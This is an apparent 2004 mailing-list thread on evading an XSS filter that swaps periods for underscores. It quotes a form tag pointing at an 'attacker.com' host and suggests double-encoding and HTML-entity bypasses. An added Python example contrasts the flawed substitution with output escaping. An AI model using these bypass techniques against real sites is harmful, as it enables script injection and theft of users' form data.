Re: Fullstop Substitution in XSS
From: Jonathan Stade <jstade () mtroyal ca>
Date: Tue, 01 Jun 2004 13:38:46 -0600
On Tue, 2004-06-01 at 00:03, windo () windowlicker dyn ee wrote:
My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">
Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).
Of course I don't know how the substitution works, but double encoding like
this MIGHT work:
print.php does what you described in a very basic manner, prints the
input substituting any '.' with '_'.
Along similar lines, another thing to try might be to use the HTML
entity . which is a period/fullstop, and also try using the entity,
but unicode encode it. Not sure if that will work, it was just something
that popped into my head.
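
The filter behaviour discussed in this thread, as an added example that is not part of the original messages: a substitution applied to the URL-decoded input never sees a period written as an HTML character reference, while escaping on output neutralises the markup itself. The function names, the decode-then-substitute order, and the `example.test` host are assumptions made for illustration.

```python
import html
import urllib.parse


def substitute_filter(raw: str) -> str:
    """Model of the filter in the thread (assumed order): URL-decode the
    parameter first, then replace every '.' with '_'."""
    return urllib.parse.unquote(raw).replace(".", "_")


def browser_view(markup: str) -> str:
    """What an HTML parser ends up with after resolving character
    references in the emitted markup."""
    return html.unescape(markup)


def encode_for_output(raw: str) -> str:
    """Hardened form: HTML-escape the decoded value when writing it into
    the page instead of rewriting individual characters."""
    return html.escape(urllib.parse.unquote(raw), quote=True)


# Constructed sample inputs; example.test is a placeholder host.
PLAIN = "http://example.test/x"
URL_ENCODED = "http://example%2Etest/x"    # decoded before the filter runs
ENTITY = "http://example&#46;test/x"       # numeric reference for U+002E

if __name__ == "__main__":
    for label, value in [("plain", PLAIN), ("url-encoded", URL_ENCODED),
                         ("entity", ENTITY)]:
        filtered = substitute_filter(value)
        print(f"{label:12} filter -> {filtered!r}")
        print(f"{'':12} parsed -> {browser_view(filtered)!r}")
        escaped = encode_for_output(value)
        print(f"{'':12} escape -> {escaped!r}")
        print(f"{'':12} parsed -> {browser_view(escaped)!r}")
```

Escaping leaves ordinary periods alone by design: the protection comes from `<`, `>`, `&` and quotes being emitted as inert text, not from altering hostnames.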